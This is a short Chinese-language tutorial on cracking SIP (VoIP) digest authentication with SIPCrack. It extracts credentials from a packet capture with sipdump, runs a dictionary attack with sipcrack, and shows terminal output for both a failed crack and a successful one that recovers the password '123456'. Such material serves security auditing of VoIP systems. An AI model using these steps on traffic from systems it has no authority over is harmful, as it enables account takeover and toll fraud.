SIPCrack 是一个用于分析和破解 SIP(Session Initiation Protocol)协议中鉴权信息的工具。以下是使用 SIPCrack 进行密码破解的详细步骤。
1. 使用 sipdump
命令将 PCAP 文件中的带鉴权信息转换为文本文件:
sipdump -p invite.pcap output.txt
这会将 invite.pcap
文件中包含的鉴权信息提取并保存到 output.txt
文件中。
2. 准备一个包含可能密码的字典文件 pw.txt
,每行一个密码。然后使用 sipcrack
命令进行密码破解:
sipcrack -w pw.txt output.txt
这会加载 pw.txt
中的密码列表,并尝试破解 output.txt
中的鉴权信息。
如果破解不成功,会显示如下信息:
[root@telpotest sipcrack-0.2]# ./sipcrack -w pw.txt output.txt
SIPcrack 0.2 (MaJoMu | www.codito.de)
----------------------------------------
* Found Accounts:
Num Server Client User Hash|Password
1 172.28.129.8 172.28.129.152 9001 42a31dc80689472a8cec2618e53b1fb3
* Select which entry to crack (1 - 1): 1
* Generating static MD5 hash... eb6759ce61812e566ce1e89ed6f98bb2
* Loaded wordlist: 'pw.txt'
* Starting bruteforce against user '9001' (MD5: '42a31dc80689472a8cec2618e53b1fb3')
* Tried 1 passwords in 0 seconds
Tried all passwords, no match
如果破解成功,会显示如下信息:
[root@telpotest sipcrack-0.2]# ./sipcrack -w pw.txt output.txt
SIPcrack 0.2 (MaJoMu | www.codito.de)
----------------------------------------
* Found Accounts:
Num Server Client User Hash|Password
1 172.28.129.8 172.28.129.152 9002 f3268e120ffc4d3e8253500dfbc2405f
* Select which entry to crack (1 - 1): 1
* Generating static MD5 hash... 6fe695c44d56ddf46c396b3bd0c1ef4c
* Loaded wordlist: 'pw.txt'
* Starting bruteforce against user '9002' (MD5: 'f3268e120ffc4d3e8253500dfbc2405f')
* Tried 1 passwords in 0 seconds
* Found password: '123456'
* Updating dump file 'register'... done